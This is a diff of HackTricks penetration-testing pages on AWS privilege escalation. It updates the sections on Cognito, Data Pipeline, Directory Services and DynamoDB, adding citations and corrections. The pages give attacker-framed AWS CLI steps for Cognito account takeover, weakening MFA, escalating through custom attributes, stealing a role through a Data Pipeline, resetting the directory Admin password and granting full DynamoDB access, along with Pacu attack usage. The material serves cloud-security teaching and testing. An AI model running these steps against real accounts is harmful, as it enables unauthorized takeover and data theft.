+# 2) Login as the victim against a User Pool App Client (the user-pool endpoint does not use IAM authorization)
 CLIENT_ID="<user_pool_app_client_id>"
 aws cognito-idp initiate-auth \
   --no-sign-request --region "$REGION" \
@@ -180,22 +178,19 @@ aws cognito-idp initiate-auth \
   --auth-parameters "USERNAME=$VICTIM_USERNAME,PASSWORD=$NEW_PASS"
 ```
 
-Related permission: `cognito-idp:AdminResetUserPassword` can be used to force a reset flow for a victim (impact depends on how password recovery is implemented and what the attacker can intercept or control).
+The related permission `cognito-idp:AdminResetUserPassword` starts a password-reset flow and places the account in `RESET_REQUIRED`; impact depends on the recovery factors and whether the attacker can control or intercept them.<sup>[[16]](#references)</sup>
 
-**Potential Impact:** Account takeover of arbitrary users; access to app-layer privileges (groups/roles/claims) and anything downstream trusting Cognito tokens; potential access to Identity Pool authenticated IAM roles.
+The public `InitiateAuth` operation can then use `USER_PASSWORD_AUTH` to request tokens, although MFA, app-client secrets, and other configured challenges may still apply.<sup>[[15]](#references)</sup>
 
-### `cognito-idp:AdminSetUserSettings` | `cognito-idp:SetUserMFAPreference` | `cognito-idp:SetUserPoolMfaConfig` | `cognito-idp:UpdateUserPool`
+**Potential Impact:** Account takeover of arbitrary users; access to app-layer privileges (groups, roles, and claims) and anything downstream trusting Cognito tokens; potential access to identity-pool authenticated IAM roles.<sup>[[2]](#references)[[14]](#references)[[15]](#references)</sup>
 
-**AdminSetUserSettings**: An attacker could potentially abuse this permission to set a mobile phone under his control as **SMS MFA of a user**.
+### `cognito-idp:AdminSetUserMFAPreference` | `cognito-idp:SetUserPoolMfaConfig` | `cognito-idp:UpdateUserPool`
 
-```bash
-aws cognito-idp admin-set-user-settings \
-    --user-pool-id <value> \
-    --username <value> \
-    --mfa-options <value>
-```
+`AdminSetUserSettings` is no longer supported; it only configured SMS MFA. Use `AdminSetUserMFAPreference` for IAM-authorized administrator changes to a user's MFA preferences.<sup>[[17]](#references)[[18]](#references)</sup>
 
-**SetUserMFAPreference:** Similar to the previous one this permission can be used to set MFA preferences of a user to bypass the MFA protection.
+`SetUserMFAPreference` is the end-user API and requires a signed-in user's access token rather than IAM authorization. It should not be treated as an IAM privilege-escalation permission.<sup>[[19]](#references)</sup>
+
+**AdminSetUserMFAPreference:** An attacker could activate, deactivate, or prioritize a user's configured MFA factors. To redirect SMS MFA, the attacker would also need a phone number on the user (and, where applicable, mark it verified with `AdminUpdateUserAttributes`); this API does not assign a phone number by itself. This does not bypass a pool configured with mandatory MFA unless the pool-level policy is also weakened.<sup>[[18]](#references)[[23]](#references)</sup>
 
 ```bash
 aws cognito-idp admin-set-user-mfa-preference \
@@ -205,7 +200,7 @@ aws cognito-idp admin-set-user-mfa-preference \
     --user-pool-id <value>
 ```
 
-**SetUserPoolMfaConfig**: Similar to the previous one this permission can be used to set MFA preferences of a user pool to bypass the MFA protection.
+**SetUserPoolMfaConfig:** This permission can change the pool-wide MFA policy between `OFF`, `ON`, and `OPTIONAL`; changing from `ON` to `OPTIONAL` or `OFF` weakens enforcement for the pool.<sup>[[20]](#references)</sup>
 
 ```bash
 aws cognito-idp set-user-pool-mfa-config \
@@ -215,15 +210,15 @@ aws cognito-idp set-user-pool-mfa-config \
     [--mfa-configuration <value>]
 ```
 
-**UpdateUserPool:** It's also possible to update the user pool to change the MFA policy. [Check cli here](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/update-user-pool.html).
+**UpdateUserPool:** It is also possible to update the user pool to change the MFA policy. [Check the CLI reference here](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/update-user-pool.html).<sup>[[21]](#references)[[40]](#references)</sup>
 
-**Potential Impact:** Indirect privesc to potentially any user the attacker knows the credentials of, this could allow to bypass the MFA protection.
+**Potential Impact:** Depending on the existing policy, these administrator permissions can weaken MFA enforcement or redirect a user's preferred factor. `AdminSetUserMFAPreference` alone does not bypass a pool whose `MfaConfiguration` is `ON`.<sup>[[18]](#references)[[20]](#references)[[21]](#references)</sup>
 
 ### `cognito-idp:AdminUpdateUserAttributes`
 
-An attacker with this permission can change **any mutable attribute** of a User Pool user (including `custom:*` attributes) to try to gain privileges in an underlying application.
+An attacker with this permission can update user attributes accepted by the administrator API, including `custom:*` attributes, to try to gain privileges in an underlying application. Custom attributes must be mutable to change them after user creation, and the attribute must be readable by the app client for its value to appear in an ID token.<sup>[[22]](#references)[[23]](#references)</sup>
 
-A common high-impact pattern is **claim-based RBAC** implemented using **custom attributes** (for example `custom:role=admin`). If the application trusts that claim, updating it and then re-authenticating can bypass authorization without touching the app.
+A common high-impact pattern is **claim-based RBAC** implemented using **custom attributes** (for example `custom:role=admin`). If the application trusts that claim, updating it and then re-authenticating can bypass authorization without touching the app.<sup>[[5]](#references)[[22]](#references)[[23]](#references)</sup>
 
 ```bash
 aws cognito-idp admin-update-user-attributes \
@@ -232,7 +227,7 @@ aws cognito-idp admin-update-user-attributes \
     --user-attributes <value>
 ```
 
-Example: upgrade your own role and refresh tokens:
+Example: upgrade your own role and refresh tokens (when `custom:role` is mutable and readable by the app client):
 
 ```bash
 REGION="us-east-1"
@@ -256,13 +251,13 @@ aws cognito-idp initiate-auth \
   --auth-parameters "USERNAME=$USERNAME,PASSWORD=$PASSWORD"
 ```
 
-**Potential Impact:** Indirect privesc in applications trusting Cognito attributes/claims for authorization; ability to modify other security-relevant attributes (for example setting `email_verified` or `phone_number_verified` to `true` can matter in some apps).
+**Potential Impact:** Indirect privesc in applications trusting Cognito attributes or claims for authorization; the administrator API can also mark an email address or phone number as verified, which may matter in some applications.<sup>[[22]](#references)[[23]](#references)</sup>
 
 ### `cognito-idp:CreateUserPoolClient` | `cognito-idp:UpdateUserPoolClient`
 
-An attacker with this permission could **create a new User Pool Client less restricted** than already existing pool clients. For example, the new client could allow any kind of method to authenticate, don't have any secret, have token revocation disabled, allow tokens to be valid for a longer period...
+An attacker with this permission could **create a new User Pool Client less restricted** than existing pool clients. For example, the new client could omit a secret, enable additional authentication flows, disable token revocation, or allow tokens to remain valid for longer.<sup>[[24]](#references)</sup>
 
-The same can be be don if instead of creating a new client, an **existing one is modified**.
+The same can be done by modifying an **existing client**.<sup>[[25]](#references)</sup>
 
 In the [**command line**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/create-user-pool-client.html) (or the [**update one**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/update-user-pool-client.html)) you can see all the options, check it!.
 
@@ -273,11 +268,11 @@ aws cognito-idp create-user-pool-client \
     [...]
 ```
 
-**Potential Impact:** Potential indirect privesc to the Identity Pool authorized user used by the User Pool by creating a new client that relax the security measures and makes possible to an attacker to login with a user he was able to create.
+**Potential Impact:** Potential indirect privesc to the identity-pool authenticated user role associated with the user pool, if a relaxed client lets an attacker authenticate as a user they can create or control.<sup>[[2]](#references)[[5]](#references)[[24]](#references)[[25]](#references)</sup>
 
 ### `cognito-idp:CreateUserImportJob` | `cognito-idp:StartUserImportJob`
 
-An attacker could abuse this permission to create users y uploading a csv with new users.
+An attacker could abuse these permissions to create users by uploading a CSV file to a user-import job. Imported users normally start in `RESET_REQUIRED` unless the pool supports a passwordless flow.<sup>[[26]](#references)[[27]](#references)[[28]](#references)</sup>
 
 ```bash
 # Create a new import job
@@ -286,23 +281,23 @@ aws cognito-idp create-user-import-job \
     --user-pool-id <value> \
     --cloud-watch-logs-role-arn <value>
 
-# Use a new import job
+# Upload the CSV file to the pre-signed URL returned by the create command
+curl -v -T "PATH_TO_CSV_FILE" \
+    -H "x-amz-server-side-encryption:aws:kms" "PRE_SIGNED_URL"
+
+# Start the import job after uploading the file
 aws cognito-idp start-user-import-job \
     --user-pool-id <value> \
     --job-id <value>
-
-# Both options before will give you a URL where you can send the CVS file with the users to create
-curl -v -T "PATH_TO_CSV_FILE" \
-    -H "x-amz-server-side-encryption:aws:kms" "PRE_SIGNED_URL"
 ```
 
-(In the case where you create a new import job you might also need the iam passrole permission, I haven't tested it yet).
+`CreateUserImportJob` returns the job details and a pre-signed S3 upload URL; upload the CSV before starting the job.<sup>[[26]](#references)[[27]](#references)[[28]](#references)</sup>
 
-**Potential Impact:** Direct privesc to the identity pool IAM role for authenticated users. Indirect privesc to other app functionalities being able to create any user.
+**Potential Impact:** Create arbitrary user records and, after completing the required password-reset or passwordless flow, potentially reach the identity-pool authenticated IAM role or application functionality that trusts those users.<sup>[[2]](#references)[[28]](#references)</sup>
 
 ### `cognito-idp:CreateIdentityProvider` | `cognito-idp:UpdateIdentityProvider`
 
-An attacker could create a new identity provider to then be able to **login through this provider**.
+An attacker could create or update an identity provider whose credentials or metadata they control, then **log in through this provider** if the provider is enabled for an app client.<sup>[[29]](#references)[[30]](#references)</sup>
 
 ```bash
 aws cognito-idp create-identity-provider \
@@ -314,26 +309,27 @@ aws cognito-idp create-identity-provider \
     [--idp-identifiers <value>]
 ```
 
-**Potential Impact:** Direct privesc to the identity pool IAM role for authenticated users. Indirect privesc to other app functionalities being able to create any user.
+**Potential Impact:** Potential access to the identity-pool authenticated IAM role and to application functionality that trusts the newly configured provider.<sup>[[2]](#references)[[29]](#references)[[30]](#references)</sup>
 
 ### cognito-sync:\* Analysis
 
-This is a very common permission by default in roles of Cognito Identity Pools. Even if a wildcard in a permissions always looks bad (specially coming from AWS), the **given permissions aren't super useful from an attackers perspective**.
+Amazon Cognito Sync will no longer be open to new customers starting July 30, 2026; existing customers can continue using it. This section is therefore relevant to existing Sync deployments.<sup>[[31]](#references)</sup>
 
-This permission allows to read use information of Identity Pools and Identity IDs inside Identity Pools (which isn't sensitive info).\
-Identity IDs might have [**Datasets**](https://docs.aws.amazon.com/cognitosync/latest/APIReference/API_Dataset.html) assigned to them, which are information of the sessions (AWS define it like a **saved game**). It might be possible that this contain some kind of sensitive information (but the probability is pretty low). You can find in the [**enumeration page**](../../aws-services/aws-cognito-enum/index.html) how to access this information.
+This is a common wildcard permission in roles of Cognito Identity Pools. Even if a wildcard in a permission always looks bad (especially when it comes from AWS), the **given permissions are not usually sufficient for a broad account compromise by themselves**.
 
-An attacker could also use these permissions to **enroll himself to a Cognito stream that publish changes** on these datases or a **lambda that triggers on cognito events**. I haven't seen this being used, and I wouldn't expect sensitive information here, but it isn't impossible.
+These permissions expose identity-scoped Sync data and datasets associated with an identity. Datasets contain application key-value data such as preferences or game state, so they may contain sensitive information even though they are not account-wide secrets.<sup>[[31]](#references)[[32]](#references)</sup> You can find in the [**enumeration page**](../../aws-services/aws-cognito-enum/index.html) how to access this information.
+
+Push synchronization can notify subscribed devices about dataset changes, while Cognito Streams publish changes to a configured Kinesis stream and Cognito Events invoke a configured Lambda function. A `cognito-sync:*` wildcard alone does not configure those destinations; impact depends on the existing identity-pool configuration.<sup>[[32]](#references)[[33]](#references)[[34]](#references)</sup>
 
 ### Automatic Tools
 
-- [Pacu](https://github.com/RhinoSecurityLabs/pacu), the AWS exploitation framework, now includes the "cognito\_\_enum" and "cognito\_\_attack" modules that automate enumeration of all Cognito assets in an account and flag weak configurations, user attributes used for access control, etc., and also automate user creation (including MFA support) and privilege escalation based on modifiable custom attributes, usable identity pool credentials, assumable roles in id tokens, etc.
+- [Pacu](https://github.com/RhinoSecurityLabs/pacu), the AWS exploitation framework, includes `cognito__enum` and `cognito__attack` modules. The modules enumerate user pools, clients, identity pools, and users, identify weak password/MFA configurations and user attributes used for access control, and can test user creation (including MFA handling), identity-pool credentials, modifiable attributes, and assumable roles for privilege-escalation paths.<sup>[[35]](#references)[[36]](#references)[[37]](#references)</sup>
 
-For a description of the modules' functions see part 2 of the [blog post](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). For installation instructions see the main [Pacu](https://github.com/RhinoSecurityLabs/pacu) page.
+For the original description of the modules' functions, see part 2 of the [blog post](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). For installation instructions, see the main [Pacu](https://github.com/RhinoSecurityLabs/pacu) page.<sup>[[37]](#references)[[38]](#references)</sup>
 
 #### Usage
 
-Sample cognito\_\_attack usage to attempt user creation and all privesc vectors against a given identity pool and user pool client:
+Sample `cognito__attack` usage to attempt user creation and the documented privilege-escalation checks against a given identity pool and user pool client:<sup>[[36]](#references)[[37]](#references)</sup>
 
 ```bash
 Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools
@@ -341,13 +337,13 @@ us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients
 59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX
 ```
 
-Sample cognito\_\_enum usage to gather all user pools, user pool clients, identity pools, users, etc. visible in the current AWS account:
+Sample `cognito__enum` usage to gather user pools, user pool clients, identity pools, users, and related data visible to the current AWS credentials:<sup>[[35]](#references)[[37]](#references)</sup>
 
 ```bash
 Pacu (new:test) > run cognito__enum
 ```
 
-- [Cognito Scanner](https://github.com/padok-team/cognito-scanner) is a CLI tool in python that implements different attacks on Cognito including a privesc escalation.
+- [Cognito Scanner](https://github.com/padok-team/cognito-scanner) is a Python CLI tool that implements Cognito attacks including account creation, account-oracle checks, and identity-pool escalation.<sup>[[39]](#references)</sup>
 
 #### Installation
 
@@ -361,8 +357,49 @@ $ pip install cognito-scanner
 $ cognito-scanner --help
 ```
 
-For more information check [https://github.com/padok-team/cognito-scanner](https://github.com/padok-team/cognito-scanner)
+For more information, check the [Cognito Scanner repository](https://github.com/padok-team/cognito-scanner).<sup>[[39]](#references)</sup>
+
+## References
+
+- [1] [GetId - Amazon Cognito Federated Identities](https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetId.html)
+- [2] [GetCredentialsForIdentity - Amazon Cognito Federated Identities](https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetCredentialsForIdentity.html)
+- [3] [SetIdentityPoolRoles - Amazon Cognito Federated Identities](https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_SetIdentityPoolRoles.html)
+- [4] [UpdateIdentityPool - Amazon Cognito Federated Identities](https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_UpdateIdentityPool.html)
+- [5] [Using role-based access control - Amazon Cognito](https://docs.aws.amazon.com/cognito/latest/developerguide/role-based-access-control.html)
+- [6] [AdminAddUserToGroup - Amazon Cognito User Pools](https://docs.aws.amazon.com/cognito-user-identity-pools/latest/APIReference/API_AdminAddUserToGroup.html)
+- [7] [CreateGroup - Amazon Cognito User Pools](https://docs.aws.amazon.com/cognito-user-identity-pools/latest/APIReference/API_CreateGroup.html)
+- [8] [UpdateGroup - Amazon Cognito User Pools](https://docs.aws.amazon.com/cognito-user-identity-pools/latest/APIReference/API_UpdateGroup.html)
+- [9] [AdminConfirmSignUp - Amazon Cognito User Pools](https://docs.aws.amazon.com/cognito-user-identity-pools/latest/APIReference/API_AdminConfirmSignUp.html)
+- [10] [AdminCreateUser - Amazon Cognito User Pools](https://docs.aws.amazon.com/cognito-user-identity-pools/latest/APIReference/API_AdminCreateUser.html)
+- [11] [AdminEnableUser - Amazon Cognito User Pools](https://docs.aws.amazon.com/cognito-user-identity-pools/latest/APIReference/API_AdminEnableUser.html)
+- [12] [AdminInitiateAuth - Amazon Cognito User Pools](https://docs.aws.amazon.com/cognito-user-identity-pools/latest/APIReference/API_AdminInitiateAuth.html)
+- [13] [AdminRespondToAuthChallenge - Amazon Cognito User Pools](https://docs.aws.amazon.com/cognito-user-identity-pools/latest/APIReference/API_AdminRespondToAuthChallenge.html)
+- [14] [AdminSetUserPassword - Amazon Cognito User Pools](https://docs.aws.amazon.com/cognito-user-identity-pools/latest/APIReference/API_AdminSetUserPassword.html)
+- [15] [InitiateAuth - Amazon Cognito User Pools](https://docs.aws.amazon.com/cognito-user-identity-pools/latest/APIReference/API_InitiateAuth.html)
+- [16] [AdminResetUserPassword - Amazon Cognito User Pools](https://docs.aws.amazon.com/cognito-user-identity-pools/latest/APIReference/API_AdminResetUserPassword.html)
+- [17] [AdminSetUserSettings - Amazon Cognito User Pools](https://docs.aws.amazon.com/cognito-user-identity-pools/latest/APIReference/API_AdminSetUserSettings.html)
+- [18] [AdminSetUserMFAPreference - Amazon Cognito User Pools](https://docs.aws.amazon.com/cognito-user-identity-pools/latest/APIReference/API_AdminSetUserMFAPreference.html)
+- [19] [SetUserMFAPreference - Amazon Cognito User Pools](https://docs.aws.amazon.com/cognito-user-identity-pools/latest/APIReference/API_SetUserMFAPreference.html)
+- [20] [SetUserPoolMfaConfig - Amazon Cognito User Pools](https://docs.aws.amazon.com/cognito-user-identity-pools/latest/APIReference/API_SetUserPoolMfaConfig.html)
+- [21] [UpdateUserPool - Amazon Cognito User Pools](https://docs.aws.amazon.com/cognito-user-identity-pools/latest/APIReference/API_UpdateUserPool.html)
+- [22] [Working with user attributes - Amazon Cognito](https://docs.aws.amazon.com/cognito/latest/developerguide/user-pool-settings-attributes.html)
+- [23] [AdminUpdateUserAttributes - Amazon Cognito User Pools](https://docs.aws.amazon.com/cognito-user-identity-pools/latest/APIReference/API_AdminUpdateUserAttributes.html)
+- [24] [create-user-pool-client - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/create-user-pool-client.html)
+- [25] [update-user-pool-client - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/update-user-pool-client.html)
+- [26] [CreateUserImportJob - Amazon Cognito User Pools](https://docs.aws.amazon.com/cognito-user-identity-pools/latest/APIReference/API_CreateUserImportJob.html)
+- [27] [StartUserImportJob - Amazon Cognito User Pools](https://docs.aws.amazon.com/cognito-user-identity-pools/latest/APIReference/API_StartUserImportJob.html)
+- [28] [Importing users into user pools from a CSV file - Amazon Cognito](https://docs.aws.amazon.com/cognito/latest/developerguide/cognito-user-pools-using-import-tool.html)
+- [29] [CreateIdentityProvider - Amazon Cognito User Pools](https://docs.aws.amazon.com/cognito-user-identity-pools/latest/APIReference/API_CreateIdentityProvider.html)
+- [30] [UpdateIdentityProvider - Amazon Cognito User Pools](https://docs.aws.amazon.com/cognito-user-identity-pools/latest/APIReference/API_UpdateIdentityProvider.html)
+- [31] [Amazon Cognito Sync - Amazon Cognito](https://docs.aws.amazon.com/cognito/latest/developerguide/cognito-sync.html)
+- [32] [Synchronizing data across clients - Amazon Cognito](https://docs.aws.amazon.com/cognito/latest/developerguide/synchronizing-data.html)
+- [33] [Implementing Amazon Cognito Sync streams](https://docs.aws.amazon.com/cognito/latest/developerguide/cognito-streams.html)
+- [34] [Customizing workflows with Amazon Cognito Events](https://docs.aws.amazon.com/cognito/latest/developerguide/cognito-events.html)
+- [35] [Pacu cognito__enum module](https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/cognito__enum/main.py)
+- [36] [Pacu cognito__attack module](https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/cognito__attack/main.py)
+- [37] [Attacking AWS Cognito with Pacu (p2)](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2/)
+- [38] [Pacu - The AWS exploitation framework](https://github.com/RhinoSecurityLabs/pacu)
+- [39] [Cognito Scanner](https://github.com/padok-team/cognito-scanner)
+- [40] [update-user-pool - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/update-user-pool.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc/README.md
@@ -1,7 +1,5 @@
 # AWS - Datapipeline Privesc
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## datapipeline
 
 For more info about datapipeline check:
@@ -10,15 +8,20 @@ For more info about datapipeline check:
 ../../aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md
 {{#endref}}
 
+> [!WARNING]
+> AWS states that Data Pipeline is no longer available to new customers; existing customers can continue to use it.<sup>[[2]](#references)</sup>
+
 ### `iam:PassRole`, `datapipeline:CreatePipeline`, `datapipeline:PutPipelineDefinition`, `datapipeline:ActivatePipeline`
 
-Users with these **permissions can escalate privileges by creating a Data Pipeline** to execute arbitrary commands using the **permissions of the assigned role:**
+Users with these **permissions can escalate privileges by creating a Data Pipeline** to execute arbitrary commands using the **permissions of the assigned role**.<sup>[[1]](#references)[[6]](#references)</sup>
+
+First create an empty pipeline and note its returned ID for the subsequent definition and activation commands.<sup>[[1]](#references)[[5]](#references)</sup>
 
 ```bash
 aws datapipeline create-pipeline --name my_pipeline --unique-id unique_string
 ```
 
-After pipeline creation, the attacker updates its definition to dictate specific actions or resource creations:
+After pipeline creation, the attacker updates its definition to dictate specific actions or resource creations.<sup>[[1]](#references)[[5]](#references)[[6]](#references)</sup>
 
 ```json
 {
@@ -35,7 +38,7 @@ After pipeline creation, the attacker updates its definition to dictate specific
       "failureAndRerunMode": "CASCADE",
       "name": "Default",
       "role": "assumable_datapipeline",
-      "resourceRole": "assumable_datapipeline"
+      "resourceRole": "assumable_ec2_profile_instance"
     },
     {
       "id": "instance",
@@ -54,24 +57,34 @@ After pipeline creation, the attacker updates its definition to dictate specific
 ```
 
 > [!NOTE]
-> Note that the **role** in **line 14, 15 and 27** needs to be a role **assumable by datapipeline.amazonaws.com** and the role in **line 28** needs to be a **role assumable by ec2.amazonaws.com with a EC2 profile instance**.
+> The **role** fields in the `Default` and `Ec2Resource` objects must identify the pipeline role that AWS Data Pipeline can assume, while the `resourceRole` fields must identify the EC2 instance role. The service authorization reference lists `datapipeline.amazonaws.com` and `ec2.amazonaws.com` as the relevant service principals for passing these roles.<sup>[[2]](#references)[[4]](#references)[[6]](#references)</sup>
 >
-> Moreover, the EC2 instance will only have access to the role assumable by the EC2 instance (so you can only steal that one).
+> Moreover, the EC2 instance will only have access to the role specified in `resourceRole` (so you can only steal that one).<sup>[[2]](#references)[[4]](#references)</sup>
+
+Upload the attacker-crafted definition to the pipeline as follows:<sup>[[5]](#references)[[6]](#references)</sup>
 
 ```bash
 aws datapipeline put-pipeline-definition --pipeline-id <pipeline-id> \
     --pipeline-definition file:///pipeline/definition.json
 ```
 
-The **pipeline definition file, crafted by the attacker, includes directives to execute commands** or create resources via the AWS API, leveraging the Data Pipeline's role permissions to potentially gain additional privileges.
+The **pipeline definition file, crafted by the attacker, includes directives to execute commands** or create resources via the AWS API, leveraging the Data Pipeline's role permissions to potentially gain additional privileges.<sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup>
 
-**Potential Impact:** Direct privesc to the ec2 service role specified.
+Finally, activate the pipeline to validate its definition and start processing its tasks:<sup>[[5]](#references)[[6]](#references)</sup>
+
+```bash
+aws datapipeline activate-pipeline --pipeline-id <pipeline-id>
+```
+
+**Potential Impact:** Direct privesc to the EC2 service role specified.<sup>[[1]](#references)[[2]](#references)</sup>
 
 ## References
 
-- [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)
+- [1] [AWS IAM Privilege Escalation – Methods and Mitigation](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)
+- [2] [IAM Roles for AWS Data Pipeline](https://docs.aws.amazon.com/datapipeline/latest/DeveloperGuide/dp-iam-roles.html)
+- [3] [ShellCommandActivity - AWS Data Pipeline](https://docs.aws.amazon.com/datapipeline/latest/DeveloperGuide/dp-object-shellcommandactivity.html)
+- [4] [Ec2Resource - AWS Data Pipeline](https://docs.aws.amazon.com/datapipeline/latest/DeveloperGuide/dp-object-ec2resource.html)
+- [5] [Upload and Activate the Pipeline Definition - AWS Data Pipeline](https://docs.aws.amazon.com/datapipeline/latest/DeveloperGuide/dp-copydata-redshift-upload-cli.html)
+- [6] [Actions, resources, and condition keys for AWS Data Pipeline](https://docs.aws.amazon.com/service-authorization/latest/reference/list_datapipeline.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc/README.md
@@ -1,7 +1,5 @@
 # AWS - Directory Services Privesc
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## Directory Services
 
 For more info about directory services check:
@@ -12,8 +10,9 @@ For more info about directory services check:
 
 ### `ds:ResetUserPassword`
 
-This permission allows to **change** the **password** of any **existent** user in the Active Directory.\
-By default, the only existent user is **Admin**.
+The `ds:ResetUserPassword` permission allows you to reset a user's password in an AWS Managed Microsoft AD or Simple AD directory, subject to AWS's directory-type and organizational-unit restrictions.<sup>[[1]](#references)[[2]](#references)</sup>
+
+For a newly created AWS Managed Microsoft AD directory, AWS creates an administrator account named **Admin**.<sup>[[3]](#references)</sup> You can invoke the AWS CLI command as follows:<sup>[[2]](#references)</sup>
 
 ```
 aws ds reset-user-password --directory-id <id> --user-name Admin --new-password Newpassword123.
@@ -21,17 +20,24 @@ aws ds reset-user-password --directory-id <id> --user-name Admin --new-password 
 
 ### AWS Management Console
 
-It's possible to enable an **application access URL** that users from AD can access to login:
+For AWS Managed Microsoft AD, you can create an **application access URL** associated with the directory; it provides a sign-in page for AWS applications such as Amazon WorkDocs.<sup>[[4]](#references)</sup>
 
 <figure><img src="../../../images/image (244).png" alt=""><figcaption></figcaption></figure>
 
-And then **grant them an AWS IAM role** for when they login, this way an AD user/group will have access over AWS management console:
+AWS Directory Service also supports enabling AWS Management Console access, then assigning directory users or groups to IAM roles that define their AWS permissions.<sup>[[5]](#references)[[6]](#references)</sup>
 
 <figure><img src="../../../images/image (155).png" alt=""><figcaption></figcaption></figure>
 
-There isn't apparently any way to enable the application access URL, the AWS Management Console and grant permission
+The documented sequence is to create the access URL, enable console access, and assign the relevant IAM role before users sign in; console access is disabled by default.<sup>[[4]](#references)[[5]](#references)[[6]](#references)</sup>
+
+## References
+
+- [1] [Actions, resources, and condition keys for AWS Directory Service](https://docs.aws.amazon.com/service-authorization/latest/reference/list_ds.html)
+- [2] [reset-user-password — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ds/reset-user-password.html)
+- [3] [Getting started with AWS Managed Microsoft AD](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_getting_started.html)
+- [4] [Creating an access URL for AWS Managed Microsoft AD](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_create_access_url.html)
+- [5] [Enabling AWS Management Console access with AWS Managed Microsoft AD credentials](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_management_console_access.html)
+- [6] [Granting AWS Managed Microsoft AD users and groups access to AWS resources with IAM roles](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_manage_roles.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
 

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc/README.md
@@ -1,7 +1,5 @@
 # AWS - DynamoDB Privesc
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## dynamodb
 
 For more info about dynamodb check:
@@ -12,13 +10,15 @@ For more info about dynamodb check:
 
 ### `dynamodb:PutResourcePolicy`, and optionally `dynamodb:GetResourcePolicy`
 
-Since March 2024, AWS offers *resource based policies* for DynamoDB ([AWS News](https://aws.amazon.com/about-aws/whats-new/2024/03/amazon-dynamodb-resource-based-policies/)).
+Since March 2024, AWS offers *resource based policies* for DynamoDB ([AWS News](https://aws.amazon.com/about-aws/whats-new/2024/03/amazon-dynamodb-resource-based-policies/)).<sup>[[1]](#references)[[2]](#references)</sup>
 
-So, if you have the `dynamodb:PutResourcePolicy` for a table, you can just grant yourself or any other principal full access to the table.
+If your identity can call `dynamodb:PutResourcePolicy` for a table, it can attach a resource-based policy that grants a specified IAM principal actions on that table, including full access when the policy allows `dynamodb:*`.<sup>[[3]](#references)[[4]](#references)[[6]](#references)</sup>
 
-Granting the `dynamodb:PutResourcePolicy` to a random principal often happens by accident, if the admins think that granting `dynamodb:Put*` would only allow the principal to put items into the database - or if they granted that permissionset before March 2024...
+Granting the `dynamodb:PutResourcePolicy` to a random principal can happen by accident if admins think that granting `dynamodb:Put*` only allows the principal to put items into the database; the action was introduced with the March 2024 resource-policy feature.<sup>[[1]](#references)[[7]](#references)</sup>
 
-Ideally, you also have `dynamodb:GetResourcePolicy`, so you do not overwrite other potentially vital permissions, but only inject the added permissions you need:
+Ideally, you also have `dynamodb:GetResourcePolicy`, so you can inspect the current policy before replacing it and preserve other potentially vital permissions while adding only what you need.<sup>[[5]](#references)[[6]](#references)</sup>
+
+Use the following command to retrieve the current policy (if it exists) and save it to a file:<sup>[[5]](#references)[[9]](#references)</sup>
 
 ```bash
 # get the current resource based policy (if it exists) and save it to a file
@@ -28,7 +28,7 @@ aws dynamodb get-resource-policy \
 	--output text > policy.json
 ```
 
-If you cannot retrieve the current policy, just use this one that grants full access over the table to your principal:
+If you cannot retrieve the current policy, use a policy like this one to grant full access over the table to your principal.<sup>[[3]](#references)[[4]](#references)[[6]](#references)</sup>
 
 ```json
 {
@@ -51,19 +51,18 @@ If you cannot retrieve the current policy, just use this one that grants full ac
 }
 ```
 
-If you need to customize it, here is a list of all possible DynamoDB actions: [AWS Documentation](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Operations.html). And here is a list of all actions that can be allowed via a resource based policy *AND which of these can be used cross-account (think data exfiltration!)*: [AWS Documentation](https://docs.aws.amazon.com/amazondynamodb/latest/developerguide/rbac-iam-actions.html)
